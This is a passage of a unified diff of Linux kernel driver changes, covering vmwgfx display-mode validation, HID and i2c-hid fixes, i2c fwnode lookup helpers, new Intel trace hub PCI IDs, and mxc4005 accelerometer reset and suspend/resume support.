+@@ -272,6 +272,8 @@ static const struct drm_connector_funcs vmw_legacy_connector_funcs = {
+ 
+ static const struct
+ drm_connector_helper_funcs vmw_ldu_connector_helper_funcs = {
++	.get_modes = vmw_connector_get_modes,
++	.mode_valid = vmw_connector_mode_valid
+ };
+ 
+ static int vmw_kms_ldu_do_bo_dirty(struct vmw_private *dev_priv,
+@@ -408,7 +410,6 @@ static int vmw_ldu_init(struct vmw_private *dev_priv, unsigned unit)
+ 	ldu->base.pref_active = (unit == 0);
+ 	ldu->base.pref_width = dev_priv->initial_width;
+ 	ldu->base.pref_height = dev_priv->initial_height;
+-	ldu->base.pref_mode = NULL;
+ 
+ 	/*
+ 	 * Remove this after enabling atomic because property values can
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+index e1f36a09c59c1..e33684f56eda8 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_scrn.c
+@@ -346,7 +346,7 @@ static void vmw_sou_connector_destroy(struct drm_connector *connector)
+ static const struct drm_connector_funcs vmw_sou_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+-	.fill_modes = vmw_du_connector_fill_modes,
++	.fill_modes = drm_helper_probe_single_connector_modes,
+ 	.destroy = vmw_sou_connector_destroy,
+ 	.reset = vmw_du_connector_reset,
+ 	.atomic_duplicate_state = vmw_du_connector_duplicate_state,
+@@ -356,6 +356,8 @@ static const struct drm_connector_funcs vmw_sou_connector_funcs = {
+ 
+ static const struct
+ drm_connector_helper_funcs vmw_sou_connector_helper_funcs = {
++	.get_modes = vmw_connector_get_modes,
++	.mode_valid = vmw_connector_mode_valid
+ };
+ 
+ 
+@@ -827,7 +829,6 @@ static int vmw_sou_init(struct vmw_private *dev_priv, unsigned unit)
+ 	sou->base.pref_active = (unit == 0);
+ 	sou->base.pref_width = dev_priv->initial_width;
+ 	sou->base.pref_height = dev_priv->initial_height;
+-	sou->base.pref_mode = NULL;
+ 
+ 	/*
+ 	 * Remove this after enabling atomic because property values can
+diff --git a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+index 0090abe892548..6dd33d1258d11 100644
+--- a/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
++++ b/drivers/gpu/drm/vmwgfx/vmwgfx_stdu.c
+@@ -40,7 +40,14 @@
+ #define vmw_connector_to_stdu(x) \
+ 	container_of(x, struct vmw_screen_target_display_unit, base.connector)
+ 
+-
++/*
++ * Some renderers such as llvmpipe will align the width and height of their
++ * buffers to match their tile size. We need to keep this in mind when exposing
++ * modes to userspace so that this possible over-allocation will not exceed
++ * graphics memory. 64x64 pixels seems to be a reasonable upper bound for the
++ * tile size of current renderers.
++ */
++#define GPU_TILE_SIZE 64
+ 
+ enum stdu_content_type {
+ 	SAME_AS_DISPLAY = 0,
+@@ -972,12 +979,46 @@ static void vmw_stdu_connector_destroy(struct drm_connector *connector)
+ 	vmw_stdu_destroy(vmw_connector_to_stdu(connector));
+ }
+ 
++static enum drm_mode_status
++vmw_stdu_connector_mode_valid(struct drm_connector *connector,
++			      struct drm_display_mode *mode)
++{
++	enum drm_mode_status ret;
++	struct drm_device *dev = connector->dev;
++	struct vmw_private *dev_priv = vmw_priv(dev);
++	u64 assumed_cpp = dev_priv->assume_16bpp ? 2 : 4;
++	/* Align width and height to account for GPU tile over-alignment */
++	u64 required_mem = ALIGN(mode->hdisplay, GPU_TILE_SIZE) *
++			   ALIGN(mode->vdisplay, GPU_TILE_SIZE) *
++			   assumed_cpp;
++	required_mem = ALIGN(required_mem, PAGE_SIZE);
++
++	ret = drm_mode_validate_size(mode, dev_priv->stdu_max_width,
++				     dev_priv->stdu_max_height);
++	if (ret != MODE_OK)
++		return ret;
+ 
++	ret = drm_mode_validate_size(mode, dev_priv->texture_max_width,
++				     dev_priv->texture_max_height);
++	if (ret != MODE_OK)
++		return ret;
++
++	if (required_mem > dev_priv->max_primary_mem)
++		return MODE_MEM;
++
++	if (required_mem > dev_priv->max_mob_pages * PAGE_SIZE)
++		return MODE_MEM;
++
++	if (required_mem > dev_priv->max_mob_size)
++		return MODE_MEM;
++
++	return MODE_OK;
++}
+ 
+ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ 	.dpms = vmw_du_connector_dpms,
+ 	.detect = vmw_du_connector_detect,
+-	.fill_modes = vmw_du_connector_fill_modes,
++	.fill_modes = drm_helper_probe_single_connector_modes,
+ 	.destroy = vmw_stdu_connector_destroy,
+ 	.reset = vmw_du_connector_reset,
+ 	.atomic_duplicate_state = vmw_du_connector_duplicate_state,
+@@ -987,6 +1028,8 @@ static const struct drm_connector_funcs vmw_stdu_connector_funcs = {
+ 
+ static const struct
+ drm_connector_helper_funcs vmw_stdu_connector_helper_funcs = {
++	.get_modes = vmw_connector_get_modes,
++	.mode_valid = vmw_stdu_connector_mode_valid
+ };
+ 
+ 
+diff --git a/drivers/greybus/interface.c b/drivers/greybus/interface.c
+index 9ec949a438ef6..52ef6be9d4499 100644
+--- a/drivers/greybus/interface.c
++++ b/drivers/greybus/interface.c
+@@ -694,6 +694,7 @@ static void gb_interface_release(struct device *dev)
+ 
+ 	trace_gb_interface_release(intf);
+ 
++	cancel_work_sync(&intf->mode_switch_work);
+ 	kfree(intf);
+ }
+ 
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index cdad3a0662876..e2e52aa0eeba9 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -1451,7 +1451,6 @@ static void implement(const struct hid_device *hid, u8 *report,
+ 			hid_warn(hid,
+ 				 "%s() called with too large value %d (n: %d)! (%s)\n",
+ 				 __func__, value, n, current->comm);
+-			WARN_ON(1);
+ 			value &= m;
+ 		}
+ 	}
+diff --git a/drivers/hid/hid-logitech-dj.c b/drivers/hid/hid-logitech-dj.c
+index 57697605b2e24..dc7b0fe83478e 100644
+--- a/drivers/hid/hid-logitech-dj.c
++++ b/drivers/hid/hid-logitech-dj.c
+@@ -1284,8 +1284,10 @@ static int logi_dj_recv_switch_to_dj_mode(struct dj_receiver_dev *djrcv_dev,
+ 		 */
+ 		msleep(50);
+ 
+-		if (retval)
++		if (retval) {
++			kfree(dj_report);
+ 			return retval;
++		}
+ 	}
+ 
+ 	/*
+diff --git a/drivers/hid/i2c-hid/i2c-hid-of-elan.c b/drivers/hid/i2c-hid/i2c-hid-of-elan.c
+index 2d991325e734c..8d4deb2def97b 100644
+--- a/drivers/hid/i2c-hid/i2c-hid-of-elan.c
++++ b/drivers/hid/i2c-hid/i2c-hid-of-elan.c
+@@ -18,9 +18,11 @@
+ #include "i2c-hid.h"
+ 
+ struct elan_i2c_hid_chip_data {
+-	unsigned int post_gpio_reset_delay_ms;
++	unsigned int post_gpio_reset_on_delay_ms;
++	unsigned int post_gpio_reset_off_delay_ms;
+ 	unsigned int post_power_delay_ms;
+ 	u16 hid_descriptor_address;
++	const char *main_supply_name;
+ };
+ 
+ struct i2c_hid_of_elan {
+@@ -29,6 +31,7 @@ struct i2c_hid_of_elan {
+ 	struct regulator *vcc33;
+ 	struct regulator *vccio;
+ 	struct gpio_desc *reset_gpio;
++	bool no_reset_on_power_off;
+ 	const struct elan_i2c_hid_chip_data *chip_data;
+ };
+ 
+@@ -38,24 +41,35 @@ static int elan_i2c_hid_power_up(struct i2chid_ops *ops)
+ 		container_of(ops, struct i2c_hid_of_elan, ops);
+ 	int ret;
+ 
+-	ret = regulator_enable(ihid_elan->vcc33);
+-	if (ret)
+-		return ret;
++	gpiod_set_value_cansleep(ihid_elan->reset_gpio, 1);
+ 
+-	ret = regulator_enable(ihid_elan->vccio);
+-	if (ret) {
+-		regulator_disable(ihid_elan->vcc33);
+-		return ret;
++	if (ihid_elan->vcc33) {
++		ret = regulator_enable(ihid_elan->vcc33);
++		if (ret)
++			goto err_deassert_reset;
+ 	}
+ 
++	ret = regulator_enable(ihid_elan->vccio);
++	if (ret)
++		goto err_disable_vcc33;
++
+ 	if (ihid_elan->chip_data->post_power_delay_ms)
+ 		msleep(ihid_elan->chip_data->post_power_delay_ms);
+ 
+ 	gpiod_set_value_cansleep(ihid_elan->reset_gpio, 0);
+-	if (ihid_elan->chip_data->post_gpio_reset_delay_ms)
+-		msleep(ihid_elan->chip_data->post_gpio_reset_delay_ms);
++	if (ihid_elan->chip_data->post_gpio_reset_on_delay_ms)
++		msleep(ihid_elan->chip_data->post_gpio_reset_on_delay_ms);
+ 
+ 	return 0;
++
++err_disable_vcc33:
++	if (ihid_elan->vcc33)
++		regulator_disable(ihid_elan->vcc33);
++err_deassert_reset:
++	if (ihid_elan->no_reset_on_power_off)
++		gpiod_set_value_cansleep(ihid_elan->reset_gpio, 0);
++
++	return ret;
+ }
+ 
+ static void elan_i2c_hid_power_down(struct i2chid_ops *ops)
+@@ -63,15 +77,27 @@ static void elan_i2c_hid_power_down(struct i2chid_ops *ops)
+ 	struct i2c_hid_of_elan *ihid_elan =
+ 		container_of(ops, struct i2c_hid_of_elan, ops);
+ 
+-	gpiod_set_value_cansleep(ihid_elan->reset_gpio, 1);
++	/*
++	 * Do not assert reset when the hardware allows for it to remain
++	 * deasserted regardless of the state of the (shared) power supply to
++	 * avoid wasting power when the supply is left on.
++	 */
++	if (!ihid_elan->no_reset_on_power_off)
++		gpiod_set_value_cansleep(ihid_elan->reset_gpio, 1);
++
++	if (ihid_elan->chip_data->post_gpio_reset_off_delay_ms)
++		msleep(ihid_elan->chip_data->post_gpio_reset_off_delay_ms);
++
+ 	regulator_disable(ihid_elan->vccio);
+-	regulator_disable(ihid_elan->vcc33);
++	if (ihid_elan->vcc33)
++		regulator_disable(ihid_elan->vcc33);
+ }
+ 
+ static int i2c_hid_of_elan_probe(struct i2c_client *client,
+ 				 const struct i2c_device_id *id)
+ {
+ 	struct i2c_hid_of_elan *ihid_elan;
++	int ret;
+ 
+ 	ihid_elan = devm_kzalloc(&client->dev, sizeof(*ihid_elan), GFP_KERNEL);
+ 	if (!ihid_elan)
+@@ -86,28 +112,63 @@ static int i2c_hid_of_elan_probe(struct i2c_client *client,
+ 	if (IS_ERR(ihid_elan->reset_gpio))
+ 		return PTR_ERR(ihid_elan->reset_gpio);
+ 
+-	ihid_elan->vccio = devm_regulator_get(&client->dev, "vccio");
+-	if (IS_ERR(ihid_elan->vccio))
+-		return PTR_ERR(ihid_elan->vccio);
++	ihid_elan->no_reset_on_power_off = of_property_read_bool(client->dev.of_node,
++						"no-reset-on-power-off");
+ 
+-	ihid_elan->vcc33 = devm_regulator_get(&client->dev, "vcc33");
+-	if (IS_ERR(ihid_elan->vcc33))
+-		return PTR_ERR(ihid_elan->vcc33);
++	ihid_elan->vccio = devm_regulator_get(&client->dev, "vccio");
++	if (IS_ERR(ihid_elan->vccio)) {
++		ret = PTR_ERR(ihid_elan->vccio);
++		goto err_deassert_reset;
++	}
+ 
+ 	ihid_elan->chip_data = device_get_match_data(&client->dev);
+ 
+-	return i2c_hid_core_probe(client, &ihid_elan->ops,
+-				  ihid_elan->chip_data->hid_descriptor_address, 0);
++	if (ihid_elan->chip_data->main_supply_name) {
++		ihid_elan->vcc33 = devm_regulator_get(&client->dev,
++						      ihid_elan->chip_data->main_supply_name);
++		if (IS_ERR(ihid_elan->vcc33)) {
++			ret = PTR_ERR(ihid_elan->vcc33);
++			goto err_deassert_reset;
++		}
++	}
++
++	ret = i2c_hid_core_probe(client, &ihid_elan->ops,
++				 ihid_elan->chip_data->hid_descriptor_address, 0);
++	if (ret)
++		goto err_deassert_reset;
++
++	return 0;
++
++err_deassert_reset:
++	if (ihid_elan->no_reset_on_power_off)
++		gpiod_set_value_cansleep(ihid_elan->reset_gpio, 0);
++
++	return ret;
+ }
+ 
+ static const struct elan_i2c_hid_chip_data elan_ekth6915_chip_data = {
+ 	.post_power_delay_ms = 1,
+-	.post_gpio_reset_delay_ms = 300,
++	.post_gpio_reset_on_delay_ms = 300,
++	.hid_descriptor_address = 0x0001,
++	.main_supply_name = "vcc33",
++};
++
++static const struct elan_i2c_hid_chip_data ilitek_ili9882t_chip_data = {
++	.post_power_delay_ms = 1,
++	.post_gpio_reset_on_delay_ms = 200,
++	.post_gpio_reset_off_delay_ms = 65,
+ 	.hid_descriptor_address = 0x0001,
++	/*
++	 * this touchscreen is tightly integrated with the panel and assumes
++	 * that the relevant power rails (other than the IO rail) have already
++	 * been turned on by the panel driver because we're a panel follower.
++	 */
++	.main_supply_name = NULL,
+ };
+ 
+ static const struct of_device_id elan_i2c_hid_of_match[] = {
+ 	{ .compatible = "elan,ekth6915", .data = &elan_ekth6915_chip_data },
++	{ .compatible = "ilitek,ili9882t", .data = &ilitek_ili9882t_chip_data },
+ 	{ }
+ };
+ MODULE_DEVICE_TABLE(of, elan_i2c_hid_of_match);
+diff --git a/drivers/hwtracing/intel_th/pci.c b/drivers/hwtracing/intel_th/pci.c
+index 648893f9e4b67..8dad239aba2ce 100644
+--- a/drivers/hwtracing/intel_th/pci.c
++++ b/drivers/hwtracing/intel_th/pci.c
+@@ -294,6 +294,11 @@ static const struct pci_device_id intel_th_pci_id_table[] = {
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xae24),
+ 		.driver_data = (kernel_ulong_t)&intel_th_2x,
+ 	},
++	{
++		/* Meteor Lake-S */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7f26),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
+ 	{
+ 		/* Raptor Lake-S */
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x7a26),
+@@ -304,6 +309,26 @@ static const struct pci_device_id intel_th_pci_id_table[] = {
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xa76f),
+ 		.driver_data = (kernel_ulong_t)&intel_th_2x,
+ 	},
++	{
++		/* Granite Rapids */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x0963),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
++	{
++		/* Granite Rapids SOC */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x3256),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
++	{
++		/* Sapphire Rapids SOC */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x3456),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
++	{
++		/* Lunar Lake */
++		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0xa824),
++		.driver_data = (kernel_ulong_t)&intel_th_2x,
++	},
+ 	{
+ 		/* Alder Lake CPU */
+ 		PCI_DEVICE(PCI_VENDOR_ID_INTEL, 0x466f),
+diff --git a/drivers/i2c/busses/i2c-at91-slave.c b/drivers/i2c/busses/i2c-at91-slave.c
+index d6eeea5166c04..131a67d9d4a68 100644
+--- a/drivers/i2c/busses/i2c-at91-slave.c
++++ b/drivers/i2c/busses/i2c-at91-slave.c
+@@ -106,8 +106,7 @@ static int at91_unreg_slave(struct i2c_client *slave)
+ 
+ static u32 at91_twi_func(struct i2c_adapter *adapter)
+ {
+-	return I2C_FUNC_SLAVE | I2C_FUNC_I2C | I2C_FUNC_SMBUS_EMUL
+-		| I2C_FUNC_SMBUS_READ_BLOCK_DATA;
++	return I2C_FUNC_SLAVE;
+ }
+ 
+ static const struct i2c_algorithm at91_twi_algorithm_slave = {
+diff --git a/drivers/i2c/busses/i2c-designware-slave.c b/drivers/i2c/busses/i2c-designware-slave.c
+index 0d15f4c1e9f7e..5b54a9b9ed1a3 100644
+--- a/drivers/i2c/busses/i2c-designware-slave.c
++++ b/drivers/i2c/busses/i2c-designware-slave.c
+@@ -232,7 +232,7 @@ static const struct i2c_algorithm i2c_dw_algo = {
+ 
+ void i2c_dw_configure_slave(struct dw_i2c_dev *dev)
+ {
+-	dev->functionality = I2C_FUNC_SLAVE | DW_IC_DEFAULT_FUNCTIONALITY;
++	dev->functionality = I2C_FUNC_SLAVE;
+ 
+ 	dev->slave_cfg = DW_IC_CON_RX_FIFO_FULL_HLD_CTRL |
+ 			 DW_IC_CON_RESTART_EN | DW_IC_CON_STOP_DET_IFADDRESSED;
+diff --git a/drivers/i2c/i2c-core-acpi.c b/drivers/i2c/i2c-core-acpi.c
+index 4dd777cc0c89f..14ae0cfc325ef 100644
+--- a/drivers/i2c/i2c-core-acpi.c
++++ b/drivers/i2c/i2c-core-acpi.c
+@@ -442,18 +442,12 @@ EXPORT_SYMBOL_GPL(i2c_acpi_find_adapter_by_handle);
+ 
+ static struct i2c_client *i2c_acpi_find_client_by_adev(struct acpi_device *adev)
+ {
+-	struct device *dev;
+-	struct i2c_client *client;
+-
+-	dev = bus_find_device_by_acpi_dev(&i2c_bus_type, adev);
+-	if (!dev)
+-		return NULL;
+-
+-	client = i2c_verify_client(dev);
+-	if (!client)
+-		put_device(dev);
++	return i2c_find_device_by_fwnode(acpi_fwnode_handle(adev));
++}
+ 
+-	return client;
++static struct i2c_adapter *i2c_acpi_find_adapter_by_adev(struct acpi_device *adev)
++{
++	return i2c_find_adapter_by_fwnode(acpi_fwnode_handle(adev));
+ }
+ 
+ static int i2c_acpi_notify(struct notifier_block *nb, unsigned long value,
+@@ -482,11 +476,17 @@ static int i2c_acpi_notify(struct notifier_block *nb, unsigned long value,
+ 			break;
+ 
+ 		client = i2c_acpi_find_client_by_adev(adev);
+-		if (!client)
+-			break;
++		if (client) {
++			i2c_unregister_device(client);
++			put_device(&client->dev);
++		}
++
++		adapter = i2c_acpi_find_adapter_by_adev(adev);
++		if (adapter) {
++			acpi_unbind_one(&adapter->dev);
++			put_device(&adapter->dev);
++		}
+ 
+-		i2c_unregister_device(client);
+-		put_device(&client->dev);
+ 		break;
+ 	}
+ 
+diff --git a/drivers/i2c/i2c-core-base.c b/drivers/i2c/i2c-core-base.c
+index 1ebc953799149..8af82f42af30b 100644
+--- a/drivers/i2c/i2c-core-base.c
++++ b/drivers/i2c/i2c-core-base.c
+@@ -1017,6 +1017,35 @@ void i2c_unregister_device(struct i2c_client *client)
+ }
+ EXPORT_SYMBOL_GPL(i2c_unregister_device);
+ 
++/**
++ * i2c_find_device_by_fwnode() - find an i2c_client for the fwnode
++ * @fwnode: &struct fwnode_handle corresponding to the &struct i2c_client
++ *
++ * Look up and return the &struct i2c_client corresponding to the @fwnode.
++ * If no client can be found, or @fwnode is NULL, this returns NULL.
++ *
++ * The user must call put_device(&client->dev) once done with the i2c client.
++ */
++struct i2c_client *i2c_find_device_by_fwnode(struct fwnode_handle *fwnode)
++{
++	struct i2c_client *client;
++	struct device *dev;
++
++	if (!fwnode)
++		return NULL;
++
++	dev = bus_find_device_by_fwnode(&i2c_bus_type, fwnode);
++	if (!dev)
++		return NULL;
++
++	client = i2c_verify_client(dev);
++	if (!client)
++		put_device(dev);
++
++	return client;
++}
++EXPORT_SYMBOL(i2c_find_device_by_fwnode);
++
+ 
+ static const struct i2c_device_id dummy_id[] = {
+ 	{ "dummy", 0 },
+@@ -1767,6 +1796,75 @@ int devm_i2c_add_adapter(struct device *dev, struct i2c_adapter *adapter)
+ }
+ EXPORT_SYMBOL_GPL(devm_i2c_add_adapter);
+ 
++static int i2c_dev_or_parent_fwnode_match(struct device *dev, const void *data)
++{
++	if (dev_fwnode(dev) == data)
++		return 1;
++
++	if (dev->parent && dev_fwnode(dev->parent) == data)
++		return 1;
++
++	return 0;
++}
++
++/**
++ * i2c_find_adapter_by_fwnode() - find an i2c_adapter for the fwnode
++ * @fwnode: &struct fwnode_handle corresponding to the &struct i2c_adapter
++ *
++ * Look up and return the &struct i2c_adapter corresponding to the @fwnode.
++ * If no adapter can be found, or @fwnode is NULL, this returns NULL.
++ *
++ * The user must call put_device(&adapter->dev) once done with the i2c adapter.
++ */
++struct i2c_adapter *i2c_find_adapter_by_fwnode(struct fwnode_handle *fwnode)
++{
++	struct i2c_adapter *adapter;
++	struct device *dev;
++
++	if (!fwnode)
++		return NULL;
++
++	dev = bus_find_device(&i2c_bus_type, NULL, fwnode,
++			      i2c_dev_or_parent_fwnode_match);
++	if (!dev)
++		return NULL;
++
++	adapter = i2c_verify_adapter(dev);
++	if (!adapter)
++		put_device(dev);
++
++	return adapter;
++}
++EXPORT_SYMBOL(i2c_find_adapter_by_fwnode);
++
++/**
++ * i2c_get_adapter_by_fwnode() - find an i2c_adapter for the fwnode
++ * @fwnode: &struct fwnode_handle corresponding to the &struct i2c_adapter
++ *
++ * Look up and return the &struct i2c_adapter corresponding to the @fwnode,
++ * and increment the adapter module's use count. If no adapter can be found,
++ * or @fwnode is NULL, this returns NULL.
++ *
++ * The user must call i2c_put_adapter(adapter) once done with the i2c adapter.
++ * Note that this is different from i2c_find_adapter_by_node().
++ */
++struct i2c_adapter *i2c_get_adapter_by_fwnode(struct fwnode_handle *fwnode)
++{
++	struct i2c_adapter *adapter;
++
++	adapter = i2c_find_adapter_by_fwnode(fwnode);
++	if (!adapter)
++		return NULL;
++
++	if (!try_module_get(adapter->owner)) {
++		put_device(&adapter->dev);
++		adapter = NULL;
++	}
++
++	return adapter;
++}
++EXPORT_SYMBOL(i2c_get_adapter_by_fwnode);
++
+ static void i2c_parse_timing(struct device *dev, char *prop_name, u32 *cur_val_p,
+ 			    u32 def_val, bool use_def)
+ {
+diff --git a/drivers/i2c/i2c-core-of.c b/drivers/i2c/i2c-core-of.c
+index 1073f82d5dd47..545436b7dd535 100644
+--- a/drivers/i2c/i2c-core-of.c
++++ b/drivers/i2c/i2c-core-of.c
+@@ -113,72 +113,6 @@ void of_i2c_register_devices(struct i2c_adapter *adap)
+ 	of_node_put(bus);
+ }
+ 
+-static int of_dev_or_parent_node_match(struct device *dev, const void *data)
+-{
+-	if (dev->of_node == data)
+-		return 1;
+-
+-	if (dev->parent)
+-		return dev->parent->of_node == data;
+-
+-	return 0;
+-}
+-
+-/* must call put_device() when done with returned i2c_client device */
+-struct i2c_client *of_find_i2c_device_by_node(struct device_node *node)
+-{
+-	struct device *dev;
+-	struct i2c_client *client;
+-
+-	dev = bus_find_device_by_of_node(&i2c_bus_type, node);
+-	if (!dev)
+-		return NULL;
+-
+-	client = i2c_verify_client(dev);
+-	if (!client)
+-		put_device(dev);
+-
+-	return client;
+-}
+-EXPORT_SYMBOL(of_find_i2c_device_by_node);
+-
+-/* must call put_device() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_find_i2c_adapter_by_node(struct device_node *node)
+-{
+-	struct device *dev;
+-	struct i2c_adapter *adapter;
+-
+-	dev = bus_find_device(&i2c_bus_type, NULL, node,
+-			      of_dev_or_parent_node_match);
+-	if (!dev)
+-		return NULL;
+-
+-	adapter = i2c_verify_adapter(dev);
+-	if (!adapter)
+-		put_device(dev);
+-
+-	return adapter;
+-}
+-EXPORT_SYMBOL(of_find_i2c_adapter_by_node);
+-
+-/* must call i2c_put_adapter() when done with returned i2c_adapter device */
+-struct i2c_adapter *of_get_i2c_adapter_by_node(struct device_node *node)
+-{
+-	struct i2c_adapter *adapter;
+-
+-	adapter = of_find_i2c_adapter_by_node(node);
+-	if (!adapter)
+-		return NULL;
+-
+-	if (!try_module_get(adapter->owner)) {
+-		put_device(&adapter->dev);
+-		adapter = NULL;
+-	}
+-
+-	return adapter;
+-}
+-EXPORT_SYMBOL(of_get_i2c_adapter_by_node);
+-
+ static const struct of_device_id*
+ i2c_of_match_device_sysfs(const struct of_device_id *matches,
+ 				  struct i2c_client *client)
+diff --git a/drivers/iio/accel/mxc4005.c b/drivers/iio/accel/mxc4005.c
+index ffae30e5eb5be..0ae544aaff0cc 100644
+--- a/drivers/iio/accel/mxc4005.c
++++ b/drivers/iio/accel/mxc4005.c
+@@ -5,6 +5,7 @@
+  * Copyright (c) 2014, Intel Corporation.
+  */
+ 
++#include <linux/delay.h>
+ #include <linux/module.h>
+ #include <linux/i2c.h>
+ #include <linux/iio/iio.h>
+@@ -36,6 +37,7 @@
+ 
+ #define MXC4005_REG_INT_CLR1		0x01
+ #define MXC4005_REG_INT_CLR1_BIT_DRDYC	0x01
++#define MXC4005_REG_INT_CLR1_SW_RST	0x10
+ 
+ #define MXC4005_REG_CONTROL		0x0D
+ #define MXC4005_REG_CONTROL_MASK_FSR	GENMASK(6, 5)
+@@ -43,6 +45,9 @@
+ 
+ #define MXC4005_REG_DEVICE_ID		0x0E
+ 
++/* Datasheet does not specify a reset time, this is a conservative guess */
++#define MXC4005_RESET_TIME_US		2000
++
+ enum mxc4005_axis {
+ 	AXIS_X,
+ 	AXIS_Y,
+@@ -66,6 +71,8 @@ struct mxc4005_data {
+ 		s64 timestamp __aligned(8);
+ 	} scan;
+ 	bool trigger_enabled;
++	unsigned int control;
++	unsigned int int_mask1;
+ };
+ 
+ /*
+@@ -349,6 +356,7 @@ static int mxc4005_set_trigger_state(struct iio_trigger *trig,
+ 		return ret;
+ 	}
+ 
++	data->int_mask1 = val;
+ 	data->trigger_enabled = state;
+ 	mutex_unlock(&data->mutex);
+ 
+@@ -384,6 +392,13 @@ static int mxc4005_chip_init(struct mxc4005_data *data)
+ 
+ 	dev_dbg(data->dev, "MXC4005 chip id %02x\n", reg);
+ 
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_CLR1,
++			   MXC4005_REG_INT_CLR1_SW_RST);
++	if (ret < 0)
++		return dev_err_probe(data->dev, ret, "resetting chip\n");
++
++	fsleep(MXC4005_RESET_TIME_US);
++
+ 	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK0, 0);
+ 	if (ret < 0)
+ 		return dev_err_probe(data->dev, ret, "writing INT_MASK0\n");
+@@ -480,6 +495,58 @@ static int mxc4005_probe(struct i2c_client *client,
+ 	return devm_iio_device_register(&client->dev, indio_dev);
+ }
+ 
++static int mxc4005_suspend(struct device *dev)
++{
++	struct iio_dev *indio_dev = dev_get_drvdata(dev);
++	struct mxc4005_data *data = iio_priv(indio_dev);
++	int ret;
++
++	/* Save control to restore it on resume */
++	ret = regmap_read(data->regmap, MXC4005_REG_CONTROL, &data->control);
++	if (ret < 0)
++		dev_err(data->dev, "failed to read reg_control\n");
++
++	return ret;
++}
++
++static int mxc4005_resume(struct device *dev)
++{
++	struct iio_dev *indio_dev = dev_get_drvdata(dev);
++	struct mxc4005_data *data = iio_priv(indio_dev);
++	int ret;
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_CLR1,
++			   MXC4005_REG_INT_CLR1_SW_RST);
++	if (ret) {
++		dev_err(data->dev, "failed to reset chip: %d\n", ret);
++		return ret;
++	}
++
++	fsleep(MXC4005_RESET_TIME_US);
++
++	ret = regmap_write(data->regmap, MXC4005_REG_CONTROL, data->control);
++	if (ret) {
++		dev_err(data->dev, "failed to restore control register\n");
++		return ret;
++	}
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK0, 0);
++	if (ret) {
++		dev_err(data->dev, "failed to restore interrupt 0 mask\n");
++		return ret;
++	}
++
++	ret = regmap_write(data->regmap, MXC4005_REG_INT_MASK1, data->int_mask1);
++	if (ret) {
++		dev_err(data->dev, "failed to restore interrupt 1 mask\n");
++		return ret;
++	}
++
++	return 0;
++}
++
++static DEFINE_SIMPLE_DEV_PM_OPS(mxc4005_pm_ops, mxc4005_suspend, mxc4005_resume);
++
+ static const struct acpi_device_id mxc4005_acpi_match[] = {
+ 	{"MXC4005",	0},
+ 	{"MXC6655",	0},
+@@ -487,6 +554,13 @@ static const struct acpi_device_id mxc4005_acpi_match[] = {
+ };
+ MODULE_DEVICE_TABLE(acpi, mxc4005_acpi_match);
+ 
++static const struct of_device_id mxc4005_of_match[] = {
++	{ .compatible = "memsic,mxc4005", },
++	{ .compatible = "memsic,mxc6655", },
++	{ },
++};
++MODULE_DEVICE_TABLE(of, mxc4005_of_match);
++
+ static const struct i2c_device_id mxc4005_id[] = {
+ 	{"mxc4005",	0},
+ 	{"mxc6655",	0},
+@@ -498,6 +572,8 @@ static struct i2c_driver mxc4005_driver = {
+ 	.driver = {
+ 		.name = MXC4005_DRV_NAME,
+ 		.acpi_match_table = ACPI_PTR(mxc4005_acpi_match),
++		.of_match_table = mxc4005_of_match,
++		.pm = pm_sleep_ptr(&mxc4005_pm_ops),
+ 	},
+ 	.probe		= mxc4005_probe,
+ 	.id_table	= mxc4005_id,
+diff --git a/drivers/iio/adc/ad9467.c b/drivers/iio/adc/ad9467.c
+index 811525857d29f..5edc2a3e687db 100644
+--- a/drivers/iio/adc/ad9467.c
++++ b/drivers/iio/adc/ad9467.c
+@@ -223,11 +223,11 @@ static void __ad9467_get_scale(struct adi_axi_adc_conv *conv, int index,
+ }
+ 
+ static const struct iio_chan_spec ad9434_channels[] = {
+-	AD9467_CHAN(0, 0, 12, 'S'),
++	AD9467_CHAN(0, 0, 12, 's'),
+ };
+ 
+ static const struct iio_chan_spec ad9467_channels[] = {
+-	AD9467_CHAN(0, 0, 16, 'S'),
++	AD9467_CHAN(0, 0, 16, 's'),
+ };
+ 
+ static const struct ad9467_chip_info ad9467_chip_tbl[] = {
+diff --git a/drivers/iio/dac/ad5592r-base.c b/drivers/iio/dac/ad5592r-base.c
+index 7a9b5fc1e5794..aa5b4c4aff38b 100644
+--- a/drivers/iio/dac/ad5592r-base.c
++++ b/drivers/iio/dac/ad5592r-base.c
+@@ -410,7 +410,7 @@ static int ad5592r_read_raw(struct iio_dev *iio_dev,
+ 			s64 tmp = *val * (3767897513LL / 25LL);
+ 			*val = div_s64_rem(tmp, 1000000000LL, val2);
+ 
+-			return IIO_VAL_INT_PLUS_MICRO;
++			return IIO_VAL_INT_PLUS_NANO;
+ 		}
+ 
